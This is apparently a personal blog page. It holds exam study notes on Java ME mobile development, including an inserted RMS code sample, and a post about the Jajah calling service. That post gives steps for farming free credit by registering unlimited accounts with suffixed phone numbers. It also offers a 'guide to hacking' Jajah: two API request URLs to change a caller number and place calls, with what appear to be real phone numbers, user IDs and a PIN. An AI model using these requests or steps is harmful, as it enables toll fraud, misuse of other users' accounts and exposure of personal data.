Saturday, May 12

Sun Certified MAD

I am a Sun Certified Mobile Application Developer. Indeed. I took the exam and passed in December 06. Here are some notes that I had before the exam.

JTWI 1.0 specification

Mandatory:

  • CLDC 1.0 (NOT 1.1)
  • MIDP 2.0
  • WMA 1.1

Note: NO MMAPI 1.1 etc...

Jar file requires:

  • JAR size
  • JAD size
  • RMS size "MIDlet-Data-Size"

Standard size:

  • Jar : 64 KB
  • JAD : 5 KB
  • RMS : 30 KB
  • Heap : 256 KB

Screen:

  • 125x125 with 12 bit color

Requires:

  • SMS Push

CLDC 1.1

  • Min. Volatile memory = 32 KB
  • Does not support: finalization, JNI, user-defined class loaders, etc.
  • Supports: threads, float, weak references, etc.
  • Collection classes inherited from J2SE: Vector, Stack, Hashtable, Enumeration, etc.
  • NO ArrayList, Queue, etc.

Preverification Process

Will do:

  • Arrange all subroutines in order
  • Augment the stack map
  • Remove certain bytecodes

WMA 1.1

Provide Message Interface:

  • Address
  • Timestamp

JAD File
  • Takes precedence over the JAR manifest
  • MicroEdition-Configuration:
  • Eg. MIDlet-Data-Size: 8888
    • 8888 bytes of RMS space will permanently be reserved for the application.

Connection
  • StreamConnectionNotifier
    • Wait for a StreamConnection to be established
    • Extends Connection
  • Default mode is READ_WRITE

MIDP 2.0

Required protocols

  • HTTP 1.1 (NOT 1.0)
  • HTTPS

Encoding
  • UTF-8 is NOT the default encoding scheme

RMS
  • Can be shared among multiple MIDlets
  • Use AUTHMODE_ANY to share
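To make the sharing rule concrete, here is an added example (my own code, not from the original notes). It assumes hypothetical store, vendor and suite names, and shows the difference between a private store and one opened with AUTHMODE_ANY, which any MIDlet suite on the device can then read:

```java
import javax.microedition.rms.RecordStore;
import javax.microedition.rms.RecordStoreException;
import javax.microedition.rms.RecordStoreNotFoundException;

/** Hypothetical helper showing MIDP 2.0 RMS sharing modes. */
public final class SharedPrefs {
    // Constructed names: another suite reaches this store by the owner's
    // MIDlet-Vendor and MIDlet-Name from the JAD plus the store name.
    static final String STORE = "prefs";
    static final String OWNER_VENDOR = "ExampleVendor";
    static final String OWNER_SUITE = "ExampleSuite";

    /** Owner side: create the store and decide who else may open it. */
    static RecordStore createAsOwner(boolean shareWithOtherSuites, boolean othersMayWrite)
            throws RecordStoreException {
        int authmode = shareWithOtherSuites
                ? RecordStore.AUTHMODE_ANY      // every suite can open it: treat data as public
                : RecordStore.AUTHMODE_PRIVATE; // MIDP default: only the owning suite
        // 'writable' only affects other suites; the owner can always write.
        RecordStore rs = RecordStore.openRecordStore(STORE, true, authmode, othersMayWrite);
        byte[] rec = "theme=dark".getBytes();
        rs.addRecord(rec, 0, rec.length); // first record gets id 1
        return rs;
    }

    /** Owner side: take a shared store back to private without recreating it. */
    static void makePrivate(RecordStore rs) throws RecordStoreException {
        rs.setMode(RecordStore.AUTHMODE_PRIVATE, true);
    }

    /** Another suite: open the owner's store; only works if the owner chose AUTHMODE_ANY. */
    static byte[] readFromOtherSuite() throws RecordStoreException {
        RecordStore rs;
        try {
            rs = RecordStore.openRecordStore(STORE, OWNER_VENDOR, OWNER_SUITE);
        } catch (SecurityException e) {
            return null; // store is AUTHMODE_PRIVATE: this suite is not allowed in
        } catch (RecordStoreNotFoundException e) {
            return null; // owner never created it
        }
        try {
            // If the owner passed writable=false, addRecord/setRecord here
            // would throw SecurityException; reading is still allowed.
            return rs.getRecord(1);
        } finally {
            rs.closeRecordStore();
        }
    }
}
```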

Others
  • 5 independent RecordStores
  • 5 simultaneous Timers

High level UI
  • ChoiceGroup has no IMPLICIT type

Security
  • MIDlets in the minimum security domain are not prompted for every permission.
  • In the JAD, specify "MIDlet-Permissions"; the MIDlet suite must be granted a protection domain with that permission, else it will NOT be installed.
  • In the JAD, specify "MIDlet-Permissions-Opt" if the permission in the protection domain is optional. The suite can still be installed if the permission is not available to the MIDlet.
  • X.509 PKI Authentication.

MMAPI
  • 5 states : UNREALIZED, REALIZED, PREFETCHED, STARTED, CLOSED

SMS
  • 160 or 70 characters, depending on the encoding


Sunday, May 6

Jajah

Jajah provides a cheap way to call using callback service. No doubt it is a great web/mobile application since it can save a lot of money! But Hoiio is better.

Moment of truth B
Another flaw with Jajah is that it allows a user to create an unlimited number of accounts with the same mobile number. Too bad they give only $0.25 USD free ):

  1. Register a new account with any name, email and a username that you can remember
  2. Enter your mobile number, but add some suffix
    E.g. if your number is 99998888, then enter 999988881
  3. Repeat with a different suffix
    E.g. 999988882
[Accurate as of Feb 2008]

Moment of truth A
But there are many serious flaws with Jajah. They have no security. Absolutely zero. We just need to sniff their traffic and we will be able to figure out how to make a call and transfer credit. A very short guide to hacking them. Figure out the rest yourself!

The HTTP queries:
Step 1: Change source number
http://www.jajah.com/engine/MobileAPI.aspx?message=mob-number-change;new-number=006597282928;type=mob-HTTP;uid=3021031;PIN=53749467;l=en;pt=0;v=0.3.3

Step 2: Call!
http://www.jajah.com/engine/MobileAPI.aspx?message=CALL;dest=006593836208;type=mob-HTTP;uid=3021078;PIN=53749467;l=en;pt=0;v=0.3.3

[Accurate as of August 2007]


Found a Little Bug